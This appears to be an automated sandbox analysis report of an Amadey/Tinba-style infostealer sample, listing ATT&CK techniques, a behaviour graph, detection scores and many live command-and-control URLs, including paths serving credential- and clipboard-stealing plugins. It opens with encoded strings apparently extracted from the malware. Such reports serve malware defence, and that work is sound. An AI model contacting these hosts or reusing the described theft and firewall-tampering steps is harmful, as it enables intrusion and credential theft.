xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                        Command and Scripting Interpreter
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        2
                        System Time Discovery
                        1
                        Remote Desktop Protocol
                        1
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        211
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        Credentials in Registry
                        1
                        Account Discovery
                        Remote Desktop Protocol2
                        Data from Local System
                        1
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Scheduled Task/Job
                        2
                        Obfuscated Files or Information
                        1
                        Credentials In Files
                        3
                        File and Directory Discovery
                        SMB/Windows Admin Shares1
                        Screen Capture
                        2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        DLL Side-Loading
                        NTDS36
                        System Information Discovery
                        Distributed Component Object Model2
                        Clipboard Data
                        112
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading
                        LSA Secrets121
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials1
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                        Process Injection
                        DCSync21
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Rundll32
                        Proc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574259 Sample: tOuVwTJrau.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Antivirus detection for URL or domain 2->79 81 10 other signatures 2->81 10 tOuVwTJrau.exe 5 2->10         started        14 Gxtuum.exe 2->14         started        16 Gxtuum.exe 2->16         started        18 Gxtuum.exe 2->18         started        process3 file4 67 C:\Users\user\AppData\Local\...behaviorgraphxtuum.exe, PE32 10->67 dropped 69 C:\Users\user\...behaviorgraphxtuum.exe:Zone.Identifier, ASCII 10->69 dropped 101 Contains functionality to start a terminal service 10->101 103 Contains functionality to inject code into remote processes 10->103 20 Gxtuum.exe 18 10->20         started        signatures5 process6 dnsIp7 71 185.81.68.147, 49736, 49738, 49740 KLNOPT-ASFI Finland 20->71 73 185.81.68.148, 49737, 49739, 49744 KLNOPT-ASFI Finland 20->73 57 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 20->57 dropped 59 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 20->59 dropped 61 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 20->61 dropped 63 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 20->63 dropped 93 Multi AV Scanner detection for dropped file 20->93 95 Contains functionality to start a terminal service 20->95 97 Machine Learning detection for dropped file 20->97 25 rundll32.exe 20->25         started        27 rundll32.exe 20->27         started        29 rundll32.exe 20->29         started        32 rundll32.exe 20->32         started        file8 signatures9 process10 signatures11 34 rundll32.exe 25->34         started        37 rundll32.exe 23 27->37         started        105 System process connects to network (likely due to code injection or exploit) 29->105 process12 signatures13 83 Tries to steal Instant Messenger accounts or passwords 34->83 85 Tries to harvest and steal ftp login credentials 34->85 87 Tries to harvest and steal browser information (history, passwords, etc) 34->87 39 powershell.exe 34->39         started        43 netsh.exe 2 34->43         started        89 Uses netsh to modify the Windows network and firewall settings 37->89 91 Tries to harvest and steal WLAN passwords 37->91 45 powershell.exe 25 37->45         started        47 netsh.exe 2 37->47         started        process14 file15 65 C:\Users\user\...\246122658369_Desktop.zip, Zip 39->65 dropped 99 Loading BitLocker PowerShell Module 39->99 49 conhost.exe 39->49         started        51 conhost.exe 43->51         started        53 conhost.exe 45->53         started        55 conhost.exe 47->55         started        signatures16 process17

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        tOuVwTJrau.exe70%VirustotalBrowse
                        tOuVwTJrau.exe66%ReversingLabsWin32.Infostealer.Tinba
                        tOuVwTJrau.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll34%ReversingLabsWin64.Infostealer.Tinba
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll47%ReversingLabsWin32.Trojan.Amadey
                        C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe66%ReversingLabsWin32.Infostealer.Tinba
                        C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll47%ReversingLabsWin32.Trojan.Amadey
                        C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll34%ReversingLabsWin64.Infostealer.Tinba
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1t100%Avira URL Cloudmalware
                        http://185.81.68.147/7vhfjke3/index.php?wal=1ies.100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php&100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.php&100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.php$100%Avira URL Cloudphishing
                        http://185.81.68.148/X100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1h100%Avira URL Cloudmalware
                        http://185.81.68.148/8Fvu5jh4DbS/index.php0100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpd7100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1100%Avira URL Cloudmalware
                        http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1z100%Avira URL Cloudmalware
                        http://185.81.68.147/7vhfjke3/index.php1100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.php100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.php6100%Avira URL Cloudphishing
                        http://185.81.68.148/wsys100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.php8100%Avira URL Cloudphishing
                        http://185.81.68.148/SysWOW64100%Avira URL Cloudphishing
                        http://185.81.68.147/ows100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/Plugins/cred64.dll100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpoded100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phps100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpv100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php100%Avira URL Cloudmalware
                        http://185.81.68.147/7vhfjke3/index.php?wal=1H;0100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phpz#29100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php98100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpb100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phpa100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phph100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpf100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpg100%Avira URL Cloudphishing
                        http://185.81.68.148/100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpXx/M100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpn100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpm100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpR100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phpo100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phps100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phpu100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnN100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phpw100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpZ100%Avira URL Cloudphishing
                        http://185.81.68.148/ta;100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1eB100%Avira URL Cloudmalware
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpndows100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phpE100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpL100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.php?wal=1tesH100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpK100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpJ100%Avira URL Cloudphishing
                        http://185.81.68.148/Fvu5jh4DbS/index.php100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.php?wal=1urn100%Avira URL Cloudphishing
                        http://185.81.68.147/100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.php?wal=1100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1b100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phpbf198100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.php?R100%Avira URL Cloudmalware
                        http://185.81.68.147/7vhfjke3/index.php?wal=1f100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.php100%Avira URL Cloudmalware
                        http://185.81.68.148/8Fvu5jh4DbS/index.php:100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/Plugins/clip64.dll100%Avira URL Cloudphishing
                        http://185.81.68.147/7vhfjke3/index.phpX100%Avira URL Cloudphishing
                        http://185.81.68.148/8Fvu5jh4DbS/index.phpded100%Avira URL Cloudphishing
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        217.20.58.99
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1true
                          • Avira URL Cloud: malware
                          unknown
                          http://185.81.68.148/8Fvu5jh4DbS/index.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://185.81.68.147/7vhfjke3/index.php?wal=1true
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.81.68.147/7vhfjke3/index.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://185.81.68.147/7vhfjke3/index.php?wal=1ies.rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.81.68.148/8Fvu5jh4DbS/index.php&Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1trundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://185.81.68.147/7vhfjke3/index.php$Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.81.68.147/7vhfjke3/index.php&rundll32.exe, 00000004.00000002.2137636900.0000021E06674000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1hrundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://185.81.68.148/Xrundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.81.68.148/8Fvu5jh4DbS/index.php0rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://185.81.68.147/7vhfjke3/index.php1Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.148/8Fvu5jh4DbS/index.phpd7Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1zrundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.phpGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.147/7vhfjke3/index.php6rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.148/wsysGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.147/7vhfjke3/index.php8rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.148/SysWOW64Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.147/owsGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.147/7vhfjke3/Plugins/cred64.dllGxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            http://185.81.68.148/8Fvu5jh4DbS/index.phpodedGxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            https://contoso.com/powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2008936474.0000018FD6DE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://185.81.68.148/8Fvu5jh4DbS/index.phpsrundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://185.81.68.148/8Fvu5jh4DbS/index.phpvGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.2008936474.0000018FD5511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://185.81.68.147/7vhfjke3/index.php?wal=1H;0rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://185.81.68.147/7vhfjke3/index.phpz#29Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://185.81.68.148/8Fvu5jh4DbS/index.php98Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://185.81.68.148/8Fvu5jh4DbS/index.phpbGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2008936474.0000018FD6DE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2084465278.00000249B4DAF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2083831984.00000249B4DA2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E013000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://185.81.68.147/7vhfjke3/index.phpaGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://185.81.68.148/8Fvu5jh4DbSrundll32.exe, 00000010.00000002.2924026197.0000000003459000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://185.81.68.148/8Fvu5jh4DbS/index.phphrundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://185.81.68.148/8Fvu5jh4DbS/index.phpgrundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://185.81.68.148/8Fvu5jh4DbS/index.phpfGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.2924314576.0000000000D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2008936474.0000018FD5739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://185.81.68.148/Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            http://185.81.68.148/8Fvu5jh4DbS/index.phpXx/Mrundll32.exe, 0000000C.00000002.2924024643.0000000003126000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            http://185.81.68.148/8Fvu5jh4DbS/index.phpnGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            http://185.81.68.148/8Fvu5jh4DbS/index.phpmrundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000B.00000002.2008936474.0000018FD6B3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E013000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://185.81.68.147/7vhfjke3/index.phporundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://185.81.68.148/8Fvu5jh4DbS/index.phpRGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://185.81.68.147/7vhfjke3/index.phpsrundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://185.81.68.147/7vhfjke3/index.phpurundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnNrundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://185.81.68.147/7vhfjke3/index.phpwGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://185.81.68.148/8Fvu5jh4DbS/index.phpZGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1eBrundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://185.81.68.148/ta;rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  http://185.81.68.148/8Fvu5jh4DbS/index.phpFGxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://185.81.68.148/8Fvu5jh4DbS/index.phpndowsGxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
